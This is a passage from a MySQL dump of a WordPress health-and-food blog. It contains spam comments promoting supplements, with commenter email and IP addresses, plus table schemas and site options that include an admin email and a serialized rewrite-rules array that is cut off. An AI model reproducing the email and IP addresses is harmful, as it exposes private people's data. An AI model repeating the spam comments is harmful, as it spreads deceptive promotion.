nonetheless, you read it in a short amount of time. I believe that you ought to give it another shot in the near future. If you make sure that this trek is safe, I will most likely try to do that again and again.',0,'0','','comment',0,0),(10425,5516,'Puravive Reviews','treva_alias@hotmail.com','https://www.healthmassive.com/','103.115.198.103','2024-01-08 04:29:38','2024-01-08 04:29:38','I loved you better than you would ever be able to express here. The picture is beautiful, and your wording is elegant; nonetheless, you read it in a short amount of time. I believe that you ought to give it another shot in the near future. If you make sure that this trek is safe, I will most likely try to do that again and again.',0,'0','','comment',0,0),(10426,5730,'temp email','columbus_voluptas@gmail.com','https://treemail.pro/','103.150.206.75','2024-01-12 01:05:48','2024-01-12 01:05:48','Simply wish to say your article is as amazing. The clearness in your post is just nice and i could assume you\'re an expert on this subject. Well with your permission let me to grab your feed to keep updated with forthcoming post. Thanks a million and please carry on the gratifying work.',0,'0','','comment',0,0),(10427,5519,'True Form Keto Review','tre_dolore@gmail.com','https://www.nutritionistwellness.com/','103.120.119.152','2024-01-12 21:47:01','2024-01-12 21:47:01','Thank you for the good writeup It in fact was a amusement account it Look advanced to far added agreeable from you However how could we communicate',0,'0','','comment',0,0); /*!40000 ALTER TABLE `wpvt_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_event_hours` -- DROP TABLE IF EXISTS `wpvt_event_hours`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_event_hours` ( `event_hours_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `event_id` bigint(20) NOT NULL, `weekday_id` bigint(20) NOT NULL, `start` time NOT NULL, `end` time NOT NULL, `tooltip` text NOT NULL, `before_hour_text` text NOT NULL, `after_hour_text` text NOT NULL, `category` varchar(255) NOT NULL, `available_places` int(11) NOT NULL DEFAULT 0, `slots_per_user` int(11) NOT NULL DEFAULT 1, PRIMARY KEY (`event_hours_id`), KEY `event_id` (`event_id`), KEY `weekday_id` (`weekday_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_event_hours` -- LOCK TABLES `wpvt_event_hours` WRITE; /*!40000 ALTER TABLE `wpvt_event_hours` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_event_hours` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_event_hours_booking` -- DROP TABLE IF EXISTS `wpvt_event_hours_booking`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_event_hours_booking` ( `booking_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `event_hours_id` bigint(20) unsigned NOT NULL, `user_id` bigint(20) unsigned NOT NULL DEFAULT 0, `booking_datetime` datetime NOT NULL, `validation_code` varchar(32) NOT NULL, `guest_id` bigint(20) unsigned NOT NULL DEFAULT 0, PRIMARY KEY (`booking_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_event_hours_booking` -- LOCK TABLES `wpvt_event_hours_booking` WRITE; /*!40000 ALTER TABLE `wpvt_event_hours_booking` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_event_hours_booking` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_links` -- DROP TABLE IF EXISTS `wpvt_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_links` ( `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `link_url` varchar(255) NOT NULL DEFAULT '', `link_name` varchar(255) NOT NULL DEFAULT '', `link_image` varchar(255) NOT NULL DEFAULT '', `link_target` varchar(25) NOT NULL DEFAULT '', `link_description` varchar(255) NOT NULL DEFAULT '', `link_visible` varchar(20) NOT NULL DEFAULT 'Y', `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1, `link_rating` int(11) NOT NULL DEFAULT 0, `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `link_rel` varchar(255) NOT NULL DEFAULT '', `link_notes` mediumtext NOT NULL, `link_rss` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_links` -- LOCK TABLES `wpvt_links` WRITE; /*!40000 ALTER TABLE `wpvt_links` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_litespeed_url` -- DROP TABLE IF EXISTS `wpvt_litespeed_url`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_litespeed_url` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `url` varchar(500) NOT NULL, `cache_tags` varchar(1000) NOT NULL DEFAULT '', PRIMARY KEY (`id`), UNIQUE KEY `url` (`url`(191)), KEY `cache_tags` (`cache_tags`(191)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_litespeed_url` -- LOCK TABLES `wpvt_litespeed_url` WRITE; /*!40000 ALTER TABLE `wpvt_litespeed_url` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_litespeed_url` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_litespeed_url_file` -- DROP TABLE IF EXISTS `wpvt_litespeed_url_file`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_litespeed_url_file` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `url_id` bigint(20) NOT NULL, `vary` varchar(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'md5 of final vary', `filename` varchar(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'md5 of file content', `type` tinyint(4) NOT NULL COMMENT 'css=1,js=2,ccss=3,ucss=4', `mobile` tinyint(4) NOT NULL COMMENT 'mobile=1', `webp` tinyint(4) NOT NULL COMMENT 'webp=1', `expired` int(11) NOT NULL DEFAULT 0, PRIMARY KEY (`id`), KEY `filename` (`filename`), KEY `type` (`type`), KEY `url_id_2` (`url_id`,`vary`,`type`), KEY `filename_2` (`filename`,`expired`), KEY `url_id` (`url_id`,`expired`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_litespeed_url_file` -- LOCK TABLES `wpvt_litespeed_url_file` WRITE; /*!40000 ALTER TABLE `wpvt_litespeed_url_file` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_litespeed_url_file` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_options` -- DROP TABLE IF EXISTS `wpvt_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_options` ( `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `option_name` varchar(191) NOT NULL DEFAULT '', `option_value` longtext NOT NULL, `autoload` varchar(20) NOT NULL DEFAULT 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`), KEY `autoload` (`autoload`) ) ENGINE=MyISAM AUTO_INCREMENT=340000 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_options` -- LOCK TABLES `wpvt_options` WRITE; /*!40000 ALTER TABLE `wpvt_options` DISABLE KEYS */; INSERT INTO `wpvt_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1,'siteurl','http://tummyrevolution.com','yes'),(2,'home','http://tummyrevolution.com','yes'),(3,'blogname','Tummy Revolution','yes'),(4,'blogdescription','A place for health and food lovers','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','sara.chadwick@me.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','92','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(29,'rewrite_rules','a:211:{s:17:\"portfolio-item/?$\";s:34:\"index.php?post_type=portfolio-item\";s:47:\"portfolio-item/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?post_type=portfolio-item&feed=$matches[1]\";s:42:\"portfolio-item/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?post_type=portfolio-item&feed=$matches[1]\";s:34:\"portfolio-item/page/([0-9]{1,})/?$\";s:52:\"index.php?post_type=portfolio-item&paged=$matches[1]\";s:14:\"team-member/?$\";s:31:\"index.php?post_type=team-member\";s:44:\"team-member/feed/(feed|rdf|rss|rss2|atom)/?$\";s:48:\"index.php?post_type=team-member&feed=$matches[1]\";s:39:\"team-member/(feed|rdf|rss|rss2|atom)/?$\";s:48:\"index.php?post_type=team-member&feed=$matches[1]\";s:31:\"team-member/page/([0-9]{1,})/?$\";s:49:\"index.php?post_type=team-member&paged=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:42:\"portfolio-item/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"portfolio-item/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"portfolio-item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"portfolio-item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"portfolio-item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"portfolio-item/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"portfolio-item/([^/]+)/embed/?$\";s:47:\"index.php?portfolio-item=$matches[1]&embed=true\";s:35:\"portfolio-item/([^/]+)/trackback/?$\";s:41:\"index.php?portfolio-item=$matches[1]&tb=1\";s:55:\"portfolio-item/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:53:\"index.php?portfolio-item=$matches[1]&feed=$matches[2]\";s:50:\"portfolio-item/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:53:\"index.php?portfolio-item=$matches[1]&feed=$matches[2]\";s:43:\"portfolio-item/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?portfolio-item=$matches[1]&paged=$matches[2]\";s:50:\"portfolio-item/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?portfolio-item=$matches[1]&cpage=$matches[2]\";s:39:\"portfolio-item/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?portfolio-item=$matches[1]&page=$matches[2]\";s:31:\"portfolio-item/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"portfolio-item/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"portfolio-item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"portfolio-item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"portfolio-item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"portfolio-item/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:59:\"portfolio-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?portfolio-category=$matches[1]&feed=$matches[2]\";s:54:\"portfolio-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?portfolio-category=$matches[1]&feed=$matches[2]\";s:35:\"portfolio-category/([^/]+)/embed/?$\";s:51:\"index.php?portfolio-category=$matches[1]&embed=true\";s:47:\"portfolio-category/([^/]+)/page/?([0-9]{1,})/?$\";s:58:\"index.php?portfolio-category=$matches[1]&paged=$matches[2]\";s:29:\"portfolio-category/([^/]+)/?$\";s:40:\"index.php?portfolio-category=$matches[1]\";s:54:\"portfolio-tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?portfolio-tag=$matches[1]&feed=$matches[2]\";s:49:\"portfolio-tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?portfolio-tag=$matches[1]&feed=$matches[2]\";s:30:\"portfolio-tag/([^/]+)/embed/?$\";s:46:\"index.php?portfolio-tag=$matches[1]&embed=true\";s:42:\"portfolio-tag/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?portfolio-tag=$matches[1]&paged=$matches[2]\";s:24:\"portfolio-tag/([^/]+)/?$\";s:35:\"index.php?portfolio-tag=$matches[1]\";s:39:\"team-member/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"team-member/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"team-member/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"team-member/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"team-member/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"team-member/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:28:\"team-member/([^/]+)/embed/?$\";s:44:\"index.php?team-member=$matches[1]&embed=true\";s:32:\"team-member/([^/]+)/trackback/?$\";s:38:\"index.php?team-member=$matches[1]&tb=1\";s:52:\"team-member/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?team-member=$matches[1]&feed=$matches[2]\";s:47:\"team-member/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?team-member=$matches[1]&feed=$matches[2]\";s:40:\"team-member/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?team-member=$matches[1]&paged=$matches[2]\";s:47:\"team-member/([^/]+)/comment-page-([0-9]{1,})/?$\";s:51:\"index.php?team-member=$matches[1]&cpage=$matches[2]\";s:36:\"team-member/([^/]+)(?:/([0-9]+))?/?$\";s:50:\"index.php?team-member=$matches[1]&page=$matches[2]\";s:28:\"team-member/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"team-member/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"team-member/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"team-member/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"team-member/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"team-member/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:54:\"team-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?team-category=$matches[1]&feed=$matches[2]\";s:49:\"team-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?team-category=$matches[1]&feed=$matches[2]\";s:30:\"team-category/([^/]+)/embed/?$\";s:46:\"index.php?team-category=$matches[1]&embed=true\";s:42:\"team-category/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?team-category=$matches[1]&paged=$matches[2]\";s:24:\"team-category/([^/]+)/?$\";s:35:\"index.php?team-category=$matches[1]\";s:40:\"testimonials/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"testimonials/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"testimonials/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"testimonials/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"testimonials/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"testimonials/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"testimonials/([^/]+)/embed/?$\";s:45:\"index.php?testimonials=$matches[1]&embed=true\";s:33:\"testimonials/([^/]+)/trackback/?$\";s:39:\"index.php?testimonials=$matches[1]&tb=1\";s:41:\"testimonials/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&paged=$matches[2]\";s:48:\"testimonials/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&cpage=$matches[2]\";s:37:\"testimonials/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?testimonials=$matches[1]&page=$matches[2]\";s:29:\"testimonials/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"testimonials/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"testimonials/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"testimonials/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"testimonials/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"testimonials/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:62:\"testimonials-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?testimonials-category=$matches[1]&feed=$matches[2]\";s:57:\"testimonials-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?testimonials-category=$matches[1]&feed=$matches[2]\";s:38:\"testimonials-category/([^/]+)/embed/?$\";s:54:\"index.php?testimonials-category=$matches[1]&embed=true\";s:50:\"testimonials-category/([^/]+)/page/?([0-9]{1,})/?$\";s:61:\"index.php?testimonials-category=$matches[1]&paged=$matches[2]\";s:32:\"testimonials-category/([^/]+)/?$\";s:43:\"index.php?testimonials-category=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:40:\"vc_grid_item/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"vc_grid_item/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"vc_grid_item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"vc_grid_item/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"vc_grid_item/([^/]+)/embed/?$\";s:45:\"index.php?vc_grid_item=$matches[1]&embed=true\";s:33:\"vc_grid_item/([^/]+)/trackback/?$\";s:39:\"index.php?vc_grid_item=$matches[1]&tb=1\";s:41:\"vc_grid_item/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&paged=$matches[2]\";s:48:\"vc_grid_item/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&cpage=$matches[2]\";s:37:\"vc_grid_item/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?vc_grid_item=$matches[1]&page=$matches[2]\";s:29:\"vc_grid_item/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"vc_grid_item/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"vc_grid_item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"vc_grid_item/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:42:\"mailmunch_page/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"mailmunch_page/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"mailmunch_page/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"mailmunch_page/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"mailmunch_page/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"mailmunch_page/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"mailmunch_page/([^/]+)/embed/?$\";s:47:\"index.php?mailmunch_page=$matches[1]&embed=true\";s:35:\"mailmunch_page/([^/]+)/trackback/?$\";s:41:\"index.php?mailmunch_page=$matches[1]&tb=1\";s:43:\"mailmunch_page/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?mailmunch_page=$matches[1]&paged=$matches[2]\";s:50:\"mailmunch_page/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?mailmunch_page=$matches[1]&cpage=$matches[2]\";s:39:\"mailmunch_page/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?mailmunch_page=$matches[1]&page=$matches[2]\";s:31:\"mailmunch_page/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"mailmunch_page/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"mailmunch_page/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"mailmunch_page/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"mailmunch_page/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"mailmunch_page/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:41:\"index.php?&page_id=1117&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s: